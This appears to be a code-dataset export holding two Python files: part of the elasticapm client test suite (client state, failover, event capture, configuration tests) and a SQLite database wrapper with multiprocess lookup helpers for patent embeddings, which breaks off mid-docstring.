input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<filename>tests/client/client_tests.py
# -*- coding: utf-8 -*-
import os
import platform
import sys
import time
import mock
import pytest
import elasticapm
from elasticapm.base import Client, ClientState
from elasticapm.conf.constants import KEYWORD_MAX_LENGTH
from elasticapm.transport.base import Transport
from elasticapm.utils import compat, encoding
def test_client_state_should_try_online():
    # A freshly created ClientState starts ONLINE and must allow sending.
    assert ClientState().should_try() is True
def test_client_state_should_try_new_error():
    """A state that just errored (retry 1, checked right now) must back off."""
    cs = ClientState()
    cs.status = cs.ERROR
    cs.retry_number = 1
    cs.last_check = time.time()
    assert cs.should_try() is False
def test_client_state_should_try_time_passed_error():
    """Once the backoff window has elapsed, sending may be retried."""
    cs = ClientState()
    cs.status = cs.ERROR
    cs.retry_number = 1
    cs.last_check = time.time() - 10
    assert cs.should_try() is True
def test_client_state_set_fail():
    """set_fail() flips the state to ERROR and records the failure."""
    cs = ClientState()
    cs.set_fail()
    assert cs.retry_number == 1
    assert cs.last_check is not None
    assert cs.status == cs.ERROR
def test_client_state_set_success():
    """set_success() resets the state to ONLINE and clears failure bookkeeping."""
    cs = ClientState()
    cs.status = cs.ERROR
    cs.last_check = "foo"
    cs.retry_number = 0
    cs.set_success()
    assert cs.retry_number == 0
    assert cs.last_check is None
    assert cs.status == cs.ONLINE
class DummyTransport(Transport):
    # Minimal no-op transport used to verify that a dotted-path
    # `transport_class` setting resolves to a custom class (see
    # test_custom_transport below).
    def send(self, data, headers):
        # Intentionally discards the payload; the tests only check wiring.
        pass
@pytest.mark.parametrize("elasticapm_client", [{"environment": "production"}], indirect=True)
def test_service_info(elasticapm_client):
    """The service-info payload must reflect config and runtime metadata."""
    info = elasticapm_client.get_service_info()
    assert info["name"] == elasticapm_client.config.service_name
    assert info["environment"] == elasticapm_client.config.environment == "production"
    assert info["language"] == {"name": "python", "version": platform.python_version()}
    assert info["agent"]["name"] == "python"
def test_process_info(elasticapm_client):
    """Process info reports pid, ppid (None where unavailable) and argv."""
    fake_argv = ["a", "b", "c"]
    with mock.patch.object(sys, "argv", fake_argv):
        info = elasticapm_client.get_process_info()
    assert info["pid"] == os.getpid()
    if hasattr(os, "getppid"):
        assert info["ppid"] == os.getppid()
    else:
        # Windows + Python 2.7 has no os.getppid
        assert info["ppid"] is None
    assert info["argv"] == fake_argv
def test_system_info(elasticapm_client):
    """System info must contain exactly hostname, architecture and platform."""
    keys = set(elasticapm_client.get_system_info().keys())
    assert keys == {"hostname", "architecture", "platform"}
def test_config_by_environment():
    """Configuration must be picked up from ELASTIC_APM_* environment variables."""
    env = {"ELASTIC_APM_SERVICE_NAME": "app", "ELASTIC_APM_SECRET_TOKEN": "token"}
    with mock.patch.dict("os.environ", env):
        client = Client()
        assert client.config.service_name == "app"
        assert client.config.secret_token == "token"
        assert client.config.disable_send is False
    with mock.patch.dict("os.environ", {"ELASTIC_APM_DISABLE_SEND": "true"}):
        client = Client()
        assert client.config.disable_send is True
    client.close()
def test_config_non_string_types():
    """
    tests if we can handle non string types as configuration, e.g.
    Value types from django-configuration
    """
    class Wrapped(object):
        # stand-in for django-configurations' lazy Value objects
        def __init__(self, content):
            self.content = content

        def __str__(self):
            return str(self.content)

        def __repr__(self):
            return repr(self.content)

    client = Client(server_url="localhost", service_name=Wrapped("bar"), secret_token=Wrapped("bay"))
    assert isinstance(client.config.service_name, compat.string_types)
    assert isinstance(client.config.secret_token, compat.string_types)
    client.close()
@pytest.mark.parametrize(
    "elasticapm_client", [{"transport_class": "tests.client.client_tests.DummyTransport"}], indirect=True
)
def test_custom_transport(elasticapm_client):
    # The dotted-path setting must resolve to the DummyTransport class above.
    assert elasticapm_client._transport_class is DummyTransport
@pytest.mark.parametrize("elasticapm_client", [{"processors": []}], indirect=True)
def test_empty_processor_list(elasticapm_client):
    # An explicitly empty processor list must not be replaced by defaults.
    assert elasticapm_client.processors == []
@pytest.mark.parametrize(
    "sending_elasticapm_client",
    [{"transport_class": "elasticapm.transport.http.Transport", "async_mode": False}],
    indirect=True,
)
@mock.patch("elasticapm.base.ClientState.should_try")
def test_send_remote_failover_sync(should_try, sending_elasticapm_client):
    """A failed sync send flips state to ERROR; a later success restores ONLINE."""
    sending_elasticapm_client.httpserver.code = 400
    sending_elasticapm_client.httpserver.content = "go away"
    should_try.return_value = True
    logger = mock.Mock()
    sending_elasticapm_client.error_logger.error = logger
    # test error
    sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "foo"})
    assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ERROR
    # two error-log calls: first carries the server response text as the
    # message, second carries the dropped payload as the first %-argument
    assert len(logger.call_args_list) == 2
    assert "go away" in logger.call_args_list[0][0][0]
    assert "foo" in logger.call_args_list[1][0][1]
    # test recovery
    sending_elasticapm_client.httpserver.code = 202
    sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "foo"})
    assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ONLINE
@mock.patch("elasticapm.transport.http.Transport.send")
@mock.patch("elasticapm.base.ClientState.should_try")
def test_send_remote_failover_sync_stdlib(should_try, http_send):
    """A transport exception marks the client ERROR; a clean send restores ONLINE."""
    should_try.return_value = True
    client = Client(
        server_url="http://example.com",
        service_name="app_name",
        secret_token="secret",
        transport_class="elasticapm.transport.http.Transport",
    )
    logger = mock.Mock()
    client.error_logger.error = logger
    # test error: the mocked transport raises instead of returning
    http_send.side_effect = ValueError("oopsie")
    client.send("http://example.com/api/store", **{"message": "oh no"})
    assert client.state.status == client.state.ERROR
    # one error-log call; the exception text is the first %-argument
    assert len(logger.call_args_list) == 1
    assert "oopsie" in logger.call_args_list[0][0][1]
    # test recovery
    http_send.side_effect = None
    client.send("http://example.com/api/store", **{"message": "oh no"})
    assert client.state.status == client.state.ONLINE
    client.close()
@pytest.mark.parametrize(
    "sending_elasticapm_client",
    [{"transport_class": "elasticapm.transport.http.AsyncTransport", "async_mode": True}],
    indirect=True,
)
@mock.patch("elasticapm.base.ClientState.should_try")
def test_send_remote_failover_async(should_try, sending_elasticapm_client):
    """Async variant of the failover test; close() drains the send queue."""
    should_try.return_value = True
    sending_elasticapm_client.httpserver.code = 400
    logger = mock.Mock()
    sending_elasticapm_client.error_logger.error = logger
    # test error
    sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "oh no"})
    # close() blocks until the async worker has processed the request,
    # so the state/log assertions below are deterministic
    sending_elasticapm_client.close()
    assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ERROR
    # first log call mentions the HTTP status, second carries the payload
    assert len(logger.call_args_list) == 2
    assert "400" in logger.call_args_list[0][0][0]
    assert "oh no" in logger.call_args_list[1][0][1]
    # test recovery
    sending_elasticapm_client.httpserver.code = 202
    sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "yay"})
    sending_elasticapm_client.close()
    assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ONLINE
@mock.patch("elasticapm.base.time.time")
def test_send(time, sending_elasticapm_client):
    """A send must emit one HTTP request with auth/encoding headers set."""
    # freeze time so the serialized payload (and its compressed size) is stable
    time.return_value = 1328055286.51
    sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, foo="bar")
    sending_elasticapm_client.close()
    request = sending_elasticapm_client.httpserver.requests[0]
    expected_headers = {
        "Content-Type": "application/json",
        "Content-Encoding": "deflate",
        "Authorization": "Bearer %s" % sending_elasticapm_client.config.secret_token,
        "User-Agent": "elasticapm-python/%s" % elasticapm.VERSION,
    }
    seen_headers = dict(request.headers)
    # only assert the headers we care about; the server may add others
    for k, v in expected_headers.items():
        assert seen_headers[k] == v
    # deflate-compressed size of the {"foo": "bar"} payload
    assert request.content_length == 22
@pytest.mark.parametrize("sending_elasticapm_client", [{"disable_send": True}], indirect=True)
@mock.patch("elasticapm.base.time.time")
def test_send_not_enabled(time, sending_elasticapm_client):
    """With disable_send set, no HTTP request may ever reach the server."""
    time.return_value = 1328055286.51
    assert sending_elasticapm_client.config.disable_send
    sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, foo="bar")
    sending_elasticapm_client.close()
    assert not sending_elasticapm_client.httpserver.requests
@pytest.mark.parametrize(
    "sending_elasticapm_client",
    [{"transport_class": "elasticapm.transport.http.Transport", "async_mode": False}],
    indirect=True,
)
@mock.patch("elasticapm.base.Client._collect_transactions")
def test_client_shutdown_sync(mock_traces_collect, sending_elasticapm_client):
    """Closing a sync client must flush transactions and drop its transports."""
    client = sending_elasticapm_client
    client.send(client.config.server_url, foo="bar")
    client.close()
    assert mock_traces_collect.call_count == 1
    assert len(client.httpserver.requests) == 1
    assert len(client._transports) == 0
@pytest.mark.parametrize(
    "sending_elasticapm_client",
    [{"transport_class": "elasticapm.transport.http.AsyncTransport", "async_mode": True}],
    indirect=True,
)
@mock.patch("elasticapm.base.Client._collect_transactions")
def test_client_shutdown_async(mock_traces_collect, sending_elasticapm_client):
    """Closing an async client must flush queued requests and its transports."""
    client = sending_elasticapm_client
    client.send(client.config.server_url, foo="bar")
    client.close()
    assert len(client._transports) == 0
    assert len(client.httpserver.requests) == 1
    assert mock_traces_collect.call_count == 1
def test_encode_decode(elasticapm_client):
    """encode() must produce bytes that decode() round-trips losslessly."""
    payload = {"foo": "bar"}
    blob = elasticapm_client.encode(payload)
    assert isinstance(blob, compat.binary_type)
    assert elasticapm_client.decode(blob) == payload
def test_explicit_message_on_exception_event(elasticapm_client):
    """An explicit `message` must override the exception's own message."""
    try:
        raise ValueError("foo")
    except ValueError:
        elasticapm_client.capture("Exception", message="foobar")
    assert len(elasticapm_client.events) == 1
    error = elasticapm_client.events.pop(0)["errors"][0]
    assert error["exception"]["message"] == "foobar"
@pytest.mark.parametrize(
    "elasticapm_client",
    [{"include_paths": ("tests",), "local_var_max_length": 20, "local_var_list_max_length": 10}],
    indirect=True,
)
def test_exception_event(elasticapm_client):
    """A captured exception carries type/message, frame metadata and
    locals trimmed to the configured lengths."""
    try:
        a_local_var = 1
        a_long_local_var = 100 * "a"
        a_long_local_list = list(range(100))
        raise ValueError("foo")
    except ValueError:
        elasticapm_client.capture("Exception")
    assert len(elasticapm_client.events) == 1
    event = elasticapm_client.events.pop(0)["errors"][0]
    assert "exception" in event
    exc = event["exception"]
    assert exc["message"] == "ValueError: foo"
    assert exc["type"] == "ValueError"
    assert exc["module"] == ValueError.__module__  # this differs in some Python versions
    assert "stacktrace" in exc
    frames = exc["stacktrace"]
    assert len(frames) == 1
    frame = frames[0]
    # FIX: was `assert frame["abs_path"], __file__.replace(".pyc" == ".py")` --
    # a truthiness assert with a bogus "message"; the comparison never ran.
    assert frame["abs_path"] == __file__.replace(".pyc", ".py")
    assert frame["filename"] == os.path.join("tests", "client", "client_tests.py")
    assert frame["module"] == __name__
    assert frame["function"] == "test_exception_event"
    assert not frame["library_frame"]
    assert frame["vars"]["a_local_var"] == 1
    # string locals truncated to local_var_max_length
    assert len(frame["vars"]["a_long_local_var"]) == 20
    # list locals truncated, with a trailing "(n more elements)" marker
    assert len(frame["vars"]["a_long_local_list"]) == 12
    assert frame["vars"]["a_long_local_list"][-1] == "(90 more elements)"
    assert "timestamp" in event
    assert "log" not in event
    # check that only frames from `tests` module are not marked as library frames
    assert all(
        frame["library_frame"] or frame["module"].startswith("tests") for frame in event["exception"]["stacktrace"]
    )
@pytest.mark.parametrize(
    "elasticapm_client",
    [{"include_paths": ("*/tests/*",), "local_var_max_length": 20, "local_var_list_max_length": 10}],
    indirect=True,
)
def test_message_event(elasticapm_client):
    """A captured message event carries a log stacktrace with trimmed locals."""
    a_local_var = 1
    a_long_local_var = 100 * "a"
    a_long_local_list = list(range(100))
    elasticapm_client.capture("Message", message="test")
    assert len(elasticapm_client.events) == 1
    event = elasticapm_client.events.pop(0)["errors"][0]
    assert event["log"]["message"] == "test"
    # message events put the stacktrace under "log", not at the top level
    assert "stacktrace" not in event
    assert "timestamp" in event
    assert "stacktrace" in event["log"]
    # check that only frames from `tests` module are not marked as library frames
    for frame in event["log"]["stacktrace"]:
        assert frame["library_frame"] or frame["module"].startswith(("tests", "__main__")), (
            frame["module"],
            frame["abs_path"],
        )
    # the first frame is this test function; check local-variable trimming
    frame = event["log"]["stacktrace"][0]
    assert frame["vars"]["a_local_var"] == 1
    assert len(frame["vars"]["a_long_local_var"]) == 20
    assert len(frame["vars"]["a_long_local_list"]) == 12
    assert frame["vars"]["a_long_local_list"][-1] == "(90 more elements)"
def test_param_message_event(elasticapm_client):
    """param_message dicts are interpolated into `message`, keeping the template."""
    elasticapm_client.capture("Message", param_message={"message": "test %s %d", "params": ("x", 1)})
    assert len(elasticapm_client.events) == 1
    log_entry = elasticapm_client.events.pop(0)["errors"][0]["log"]
    assert log_entry["message"] == "test x 1"
    assert log_entry["param_message"] == "test %s %d"
def test_message_with_percent(elasticapm_client):
    """A literal '%' in a plain message must survive formatting untouched."""
    elasticapm_client.capture("Message", message="This works 100% of the time")
    assert len(elasticapm_client.events) == 1
    log_entry = elasticapm_client.events.pop(0)["errors"][0]["log"]
    assert log_entry["message"] == "This works 100% of the time"
    assert log_entry["param_message"] == "This works 100% of the time"
def test_logger(elasticapm_client):
    """An explicit logger_name must be recorded on the event."""
    elasticapm_client.capture("Message", message="test", logger_name="test")
    assert len(elasticapm_client.events) == 1
    error = elasticapm_client.events.pop(0)["errors"][0]
    assert "timestamp" in error
    assert error["log"]["logger_name"] == "test"
@mock.patch("elasticapm.base.TransactionsStore.should_collect")
def test_metrics_collection(should_collect, sending_elasticapm_client):
    """Transactions queue up until should_collect() says to flush them."""
    client = sending_elasticapm_client
    should_collect.return_value = False
    for _ in range(7):
        client.begin_transaction("transaction.test")
        client.end_transaction("test-transaction", 200)
    assert len(client.transaction_store) == 7
    assert len(client.httpserver.requests) == 0
    should_collect.return_value = True
    client.begin_transaction("transaction.test")
    client.end_transaction("my-other-transaction", 200)
    assert len(client.httpserver.requests) == 1
@mock.patch("elasticapm.base.TransactionsStore.should_collect")
def test_call_end_twice(should_collect, elasticapm_client):
    # Ending the same transaction twice must be harmless (no exception).
    should_collect.return_value = False
    elasticapm_client.begin_transaction("celery")
    elasticapm_client.end_transaction("test-transaction", 200)
    elasticapm_client.end_transaction("test-transaction", 200)
@mock.patch("elasticapm.base.is_master_process")
def test_client_uses_sync_mode_when_master_process(is_master_process):
    """When in the master process, the client should use the non-async
    HTTP transport, even if async_mode is True."""
    is_master_process.return_value = True
    client = Client(server_url="http://example.com", service_name="app_name", secret_token="secret", async_mode=True)
    # FIX: URL previously read "exampe.com" (typo); the value is only parsed,
    # never contacted, so correcting it does not change behaviour.
    transport = client._get_transport(compat.urlparse.urlparse("http://example.com"))
    assert transport.async_mode is False
@pytest.mark.parametrize("elasticapm_client", [{"verify_server_cert": False}], indirect=True)
def test_client_disables_ssl_verification(elasticapm_client):
    """verify_server_cert=False must propagate down to the transport."""
    assert not elasticapm_client.config.verify_server_cert
    transport = elasticapm_client._get_transport(compat.urlparse.urlparse("https://example.com"))
    assert not transport._verify_server_cert
@pytest.mark.parametrize(
    "elasticapm_client", [{"transactions_ignore_patterns": ["^OPTIONS", "views.api.v2"]}], indirect=True
)
@mock.patch("elasticapm.base.TransactionsStore.should_collect")
def test_ignore_patterns(should_collect, elasticapm_client):
    """Transactions whose name matches an ignore pattern must be dropped."""
    should_collect.return_value = False
    elasticapm_client.begin_transaction("web")
    elasticapm_client.end_transaction("OPTIONS views.healthcheck", 200)
    elasticapm_client.begin_transaction("web")
    elasticapm_client.end_transaction("GET views.users", 200)
    stored = elasticapm_client.transaction_store.get_all()
    assert len(stored) == 1
    assert stored[0]["name"] == "GET views.users"
@pytest.mark.parametrize(
    "elasticapm_client", [{"transactions_ignore_patterns": ["^OPTIONS", "views.api.v2"]}], indirect=True
)
def test_ignore_patterns_with_none_transaction_name(elasticapm_client):
    """A None transaction name must be coerced to '' before pattern matching."""
    elasticapm_client.begin_transaction("web")
    transaction = elasticapm_client.end_transaction(None, 200)
    assert transaction.name == ""
@pytest.mark.parametrize("sending_elasticapm_client", [{"disable_send": True}], indirect=True)
def test_disable_send(sending_elasticapm_client):
    """With disable_send set, capture() must not hit the HTTP server."""
    assert sending_elasticapm_client.config.disable_send
    sending_elasticapm_client.capture("Message", message="test", data={"logger": "test"})
    assert not sending_elasticapm_client.httpserver.requests
@pytest.mark.parametrize("elasticapm_client", [{"service_name": "@%&!"}], indirect=True)
def test_invalid_service_name_disables_send(elasticapm_client):
    """An invalid service name is a config error and disables sending."""
    errors = elasticapm_client.config.errors
    assert len(errors) == 1
    assert "SERVICE_NAME" in errors
    assert elasticapm_client.config.disable_send
@pytest.mark.parametrize(
    "elasticapm_client", [{"service_name": "foo", "config": {"TRANSPORT_CLASS": None}}], indirect=True
)
def test_empty_transport_disables_send(elasticapm_client):
    """A missing transport class is a config error and disables sending."""
    errors = elasticapm_client.config.errors
    assert len(errors) == 1
    assert "TRANSPORT_CLASS" in errors
    assert elasticapm_client.config.disable_send
@pytest.mark.parametrize("elasticapm_client", [{"flush_interval": 2}], indirect=True)
def test_send_timer(elasticapm_client):
    """Ending a transaction must start the flush timer; close() must stop it."""
    assert elasticapm_client._send_timer is None
    assert elasticapm_client.config.flush_interval == 2
    elasticapm_client.begin_transaction("test_type")
    elasticapm_client.end_transaction("test")
    timer = elasticapm_client._send_timer
    assert timer is not None
    assert timer.interval == 2
    assert timer.is_alive()
    elasticapm_client.close()
    assert not timer.is_alive()
@pytest.mark.parametrize(
    "elasticapm_client",
    [
        {"collect_local_variables": "errors"},
        {"collect_local_variables": "transactions"},
        {"collect_local_variables": "all"},
        {"collect_local_variables": "something"},
    ],
    indirect=True,
)
def test_collect_local_variables_errors(elasticapm_client):
    """Locals are captured for errors only in 'errors'/'all' modes."""
    mode = elasticapm_client.config.collect_local_variables
    try:
        1 / 0
    except ZeroDivisionError:
        elasticapm_client.capture_exception()
    top_frame = elasticapm_client.events[0]["errors"][0]["exception"]["stacktrace"][0]
    if mode in ("errors", "all"):
        assert "vars" in top_frame, mode
    else:
        assert "vars" not in top_frame, mode
@pytest.mark.parametrize(
"elasticapm_client",
[
{"source_lines_error_library_frames": 0, "source_lines_error_app_frames": 0},
{"source_lines_error_library_frames": 1, "source_lines_error_app_frames": 1},
{"source_lines_error_library_frames": 7, "source_lines_error_app_frames": 3},
],
indirect=True,
)
def test_collect_source_errors(elasticapm_client):
library_frame_context = elasticapm_client.config.source_lines_error_library_frames
in_app_frame_context = elasticapm_client.config.source_lines_error_app_frames
try:
import json, datetime
json.dumps(datetime.datetime.now())
except TypeError:
elasticapm_client.capture_exception()
event = elasticapm_client.events[0]["errors"][0]
in_app_frame = event["exception"]["stacktrace"][0]
library_frame = event["exception"]["stacktrace"][1]
assert not in_app_frame["library_frame"]
assert library_frame["library_frame"]
if library_frame_context:
assert "context_line" in library_frame, library_frame_context
assert "pre_context" in library_frame, library_frame_context
assert "post_context" in library_frame, library_frame_context
lines = len([library_frame["context_line"]] + library_frame["pre_context"] + library_frame["post_context"])
assert lines == library_frame_context, library_frame_context
else:
assert "context_line" not in library_frame, library_frame_context
assert "pre_context" not in library_frame, library_frame_context
assert "post_context" not in library_frame, library_frame_context
if in_app_frame_context:
assert "context_line" in in_app_frame, in_app_frame_context
assert | |
# -*- coding: utf-8 -*-
"""
@File: database.py
@Description: This is a module for different database operations and
to provide a fast lookup.
This application,
1. Open/Close a SQLite database connection
2. Create a new SQLite database
3. Create a new SQLite table
4. Insert records into SQLite table
5. Create a new index on SQLite table for efficient lookup
6. Drop an index
7. Retrieve records from SQLite table
for a provided condition
8. Find out the total number of records in the database
9. Find out the table schema
10. Save/Load database to/from disk
11. Perform fast lookup on database
@Author: <NAME>
@EMail: <EMAIL>
@Created_on: 04/05/2017
@License Copyright [2017] [Chetan Borse]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
@python_version: 3.5
===============================================================================
"""
import os
import math
import time
import logging
from functools import partial
from multiprocessing import Pool
from multiprocessing import Lock
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import numpy as np
import sqlite3
from Configuration import config
# Set logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)s [%(levelname)s] %(message)s',)
log = logging.getLogger("Database")
# Global variables
PATENT_EMBEDDING_DATABASE = config.PATENT_EMBEDDING_DATABASE
PATENT_EMBEDDING_TABLE = config.PATENT_EMBEDDING_TABLE
PRIMARY_KEY = config.PRIMARY_KEY
FIELDS = config.FIELDS
PATENT_EMBEDDING_INDEX = config.PATENT_EMBEDDING_INDEX
PATENT_CLUSTERING_PATH = config.PATENT_CLUSTERING_PATH
PATENT_MATRIX = config.PATENT_MATRIX
LABELS = config.LABELS
CLASSES = config.CLASSES
DISABLE_PATENT_CATEGORIES = config.DISABLE_PATENT_CATEGORIES
# Lock for synchronized access
LOCK = Lock()
class DatabaseError(Exception):
    """Raised when any SQLite operation in this module fails."""
    pass
class FileHandlerError(Exception):
    """Raised when FileHandler cannot write records to disk."""
    pass
class Database(object):
    """
    Thin, lock-synchronized wrapper around a SQLite database.

    This class,
    1. Open/Close a SQLite database connection
    2. Create a new SQLite database
    3. Create a new SQLite table
    4. Insert records into SQLite table
    5. Create a new index on SQLite table for efficient lookup
    6. Drop an index
    7. Retrieve records from SQLite table for a provided condition
    8. Find out the total number of records in the database
    9. Find out the table schema
    10. Save/Load database to/from disk
    """

    # Rows per cursor round-trip in get(). The original passed `True`
    # (== 1) to fetchmany(), fetching a single row at a time.
    _FETCH_BATCH = 256

    def __init__(self, verbose=False):
        self.connection = None  # sqlite3.Connection, set by connect()
        self.cursor = None      # sqlite3.Cursor bound to the connection
        self.verbose = verbose  # when True, log fetched records and schema

    def connect(self,
                database=PATENT_EMBEDDING_DATABASE,
                in_memory=True,
                load_from=None):
        """
        Connect to a SQLite database.

        :param database:  Path of the on-disk database (ignored if in_memory).
        :param in_memory: Use a transient ':memory:' database.
        :param load_from: Optional SQL dump file replayed into the database.
        :raises DatabaseError: on any I/O or SQLite failure.
        """
        try:
            target = ':memory:' if in_memory else database
            self.connection = sqlite3.connect(target)
            self.cursor = self.connection.cursor()
            if load_from is not None:
                with open(load_from, "r") as f:
                    self.cursor.executescript(f.read())
                self.connection.commit()
        except Exception as e:
            # IOError, sqlite3.OperationalError and sqlite3.Error were all
            # wrapped identically; one handler is behaviourally equivalent.
            raise DatabaseError("Database application failed with: %s" % e)

    def create_table(self,
                     table=PATENT_EMBEDDING_TABLE,
                     primary_column=PRIMARY_KEY,
                     other_columns=FIELDS):
        """
        Create a new SQLite table with the given (name, type) primary key,
        then add the remaining columns one by one via ALTER TABLE.
        """
        try:
            self.cursor.execute(
                'CREATE TABLE {tn} ({f} {t} NOT NULL PRIMARY KEY)'.format(
                    tn=table, f=primary_column[0], t=primary_column[1]))
            # renamed loop variable: `type` shadowed the builtin
            for column, col_type in other_columns:
                self.cursor.execute(
                    "ALTER TABLE {tn} ADD COLUMN '{f}' {t}".format(
                        tn=table, f=column, t=col_type))
        except Exception as e:
            raise DatabaseError("Database application failed with: %s" % e)
        self.connection.commit()

    def insert(self,
               table=PATENT_EMBEDDING_TABLE,
               record=[("PatentName", None),
                       ("DocumentEmbedding", None),
                       ("PatentCategory", "UNKNOWN")]):
        """
        Insert one record, given as (column, value) pairs, into a table.

        Values are bound as SQL parameters instead of being quoted into the
        statement text, which fixes breakage (and injection) on values that
        contain quotes. str() is applied to keep the original behaviour of
        storing each value's string form.
        """
        columns = ", ".join(col for col, _ in record)
        placeholders = ", ".join("?" for _ in record)
        values = tuple(str(val) for _, val in record)
        query = "INSERT OR IGNORE INTO {tn} ({f}) VALUES ({v})".format(
            tn=table, f=columns, v=placeholders)
        self._execute_query(query, values)
        self.connection.commit()

    def create_index(self,
                     index=PATENT_EMBEDDING_INDEX,
                     table=PATENT_EMBEDDING_TABLE,
                     index_by_column=PRIMARY_KEY[0]):
        """
        Create a new unique index on SQLite table for efficient lookup.
        """
        query = 'CREATE UNIQUE INDEX {i} ON {tn} ({f})'.format(i=index,
                                                               tn=table,
                                                               f=index_by_column)
        self._execute_query(query)
        self.connection.commit()

    def drop_index(self, index):
        """
        Drop an index from a SQLite table.
        """
        query = 'DROP INDEX {i}'.format(i=index)
        self._execute_query(query)
        self.connection.commit()

    def get(self,
            table=PATENT_EMBEDDING_TABLE,
            index=PATENT_EMBEDDING_INDEX,
            required_columns=["*"],
            condition=""):
        """
        Retrieve records from SQLite table for a provided condition.

        :returns: list of row tuples matching `condition`.
        """
        query = "SELECT {f} FROM {tn} INDEXED BY {i} WHERE {c}".format(
            f=", ".join(required_columns), tn=table, i=index, c=condition)
        self._execute_query(query)
        records = []
        while True:
            batch = self.cursor.fetchmany(self._FETCH_BATCH)
            if not batch:
                break
            if self.verbose:
                for record in batch:
                    log.debug("%r", record)
            records.extend(batch)
        return records

    def get_total_records(self, table):
        """
        Returns the total number of records in the database.
        """
        query = 'SELECT COUNT(*) FROM {}'.format(table)
        self._execute_query(query)
        total_records = self.cursor.fetchall()
        if self.verbose:
            log.info('Total records: {}'.format(total_records[0][0]))
        return total_records[0][0]

    def get_table_schema(self, table):
        """
        Returns the table schema.
        """
        query = 'PRAGMA TABLE_INFO({})'.format(table)
        self._execute_query(query)
        table_schema = self.cursor.fetchall()
        if self.verbose:
            log.info("ID, Name, Type, Not_Null, Default_Value, Primary_Key")
            for column in table_schema:
                log.info(column)
        return table_schema

    def close(self, save_to=None):
        """
        Close the connection, optionally dumping the database as SQL text.

        :param save_to: Optional dump-file path; its parent directory must
                        already exist.
        :raises DatabaseError: if the dump directory is missing or any
                               I/O/SQLite operation fails.
        """
        try:
            if self.connection:
                if save_to is not None:
                    parent = save_to.rsplit(os.sep, 1)[0]
                    if not os.path.exists(parent):
                        # FIX: the original raised PathNotFoundError, which is
                        # undefined in this module (NameError at runtime).
                        raise DatabaseError("Path does not exist: %s" % parent)
                    with open(save_to, 'w') as f:
                        for line in self.connection.iterdump():
                            f.write('%s\n' % line)
                self.connection.close()
        except DatabaseError:
            raise
        except Exception as e:
            raise DatabaseError("Database application failed with: %s" % e)

    def _execute_query(self, query, params=None):
        """
        Execute a SQLite query under the module-wide lock.

        :param query:  SQL text; identifiers (table/index names) must come
                       from trusted config, as they cannot be bound.
        :param params: Optional sequence bound to '?' placeholders.
        :raises DatabaseError: on any SQLite failure.
        """
        try:
            with LOCK:
                if params is None:
                    self.cursor.execute(query)
                else:
                    self.cursor.execute(query, params)
        except Exception as e:
            raise DatabaseError("Database application failed with: %s" % e)
class FileHandler(object):
    """
    Class for saving records retrieved from the database
    in a synchronized fashion.
    """

    @staticmethod
    def write(records, filename, mode):
        """
        Write `records` to `filename` while holding the module-wide mutex,
        flushing and fsync-ing so concurrent workers see complete writes.

        :param records:  str or bytes payload (must match `mode`).
        :param filename: Target file path.
        :param mode:     open() mode, e.g. "a" or "ab".
        :raises FileHandlerError: on any I/O failure.
        """
        with LOCK:
            try:
                with open(filename, mode) as f:
                    f.write(records)
                    f.flush()
                    # push OS buffers to disk before releasing the lock
                    os.fsync(f.fileno())
            except IOError as e:
                # FIX: include the underlying cause; the original message
                # discarded the caught exception entirely.
                raise FileHandlerError("FileHandler failed: %s (%s)" % (filename, e))
def Lookup(database,
           table=PATENT_EMBEDDING_TABLE,
           index=PATENT_EMBEDDING_INDEX,
           required_columns=["*"],
           search_on=PRIMARY_KEY[0],
           save=True,
           patents=list()):
    """
    Perform lookup on database.

    Builds a `search_on IN (...)` condition from the quoted patent ids,
    fetches the matching rows, and optionally persists them via SaveRecords.
    """
    quoted_ids = ",".join("'" + str(patent) + "'" for patent in patents)
    condition = "{s} IN ({i})".format(s=search_on, i=quoted_ids)
    records = database.get(table, index, required_columns, condition)
    if save:
        SaveRecords(records)
    return records
def FastLookup(database,
               table=PATENT_EMBEDDING_TABLE,
               index=PATENT_EMBEDDING_INDEX,
               required_columns=["*"],
               search_on=PRIMARY_KEY[0],
               patents=list(),
               total_processes=1,
               save=True,
               path=os.getcwd(),
               return_from=False):
    """
    Perform fast lookup on database.

    Splits `patents` into one chunk per worker and runs Lookup() over the
    chunks in a multiprocessing Pool. Returns the list of per-chunk results
    only when `return_from` is True (otherwise returns None).

    NOTE(review): `database` is pickled into the worker processes; sqlite3
    connections are generally not picklable -- confirm on the target setup.
    NOTE(review): `path` is accepted but never used.
    """
    # one chunk per process; ceil so the last partial chunk is kept
    chunk_size = math.ceil(float(len(patents)) / total_processes)
    if chunk_size == 0:
        chunk_size = 1
    with Pool(processes=total_processes) as pool:
        # bind all leading Lookup() args; each mapped chunk becomes `patents`
        f = partial(Lookup,
                    database, table, index, required_columns, search_on, save)
        result = pool.map(f, GetChunks(patents, size=chunk_size))
    if return_from:
        return result
def GetChunks(data, size=None):
    """
    Split `data` into consecutive chunks of length `size`.

    :param data: Any sliceable sequence (list, str, ...).
    :param size: Chunk length; defaults to len(data), i.e. a single chunk.
                 FIX: the original compared `size == None` (instead of
                 `is None`) and looped forever when size was 0.
    :returns: List of chunks; the last one may be shorter. Empty input
              yields an empty list.
    """
    if not data:
        return []
    if size is None or size <= 0:
        size = len(data)
    return [data[start:start + size] for start in range(0, len(data), size)]
def SaveRecords(records):
    """
    Save records retrieved from the database.

    Records are expected as (PatentName, DocumentEmbedding[, PatentCategory])
    tuples -- presumably matching the table created in __main__; verify
    against the caller. Names/categories are appended as text, embeddings
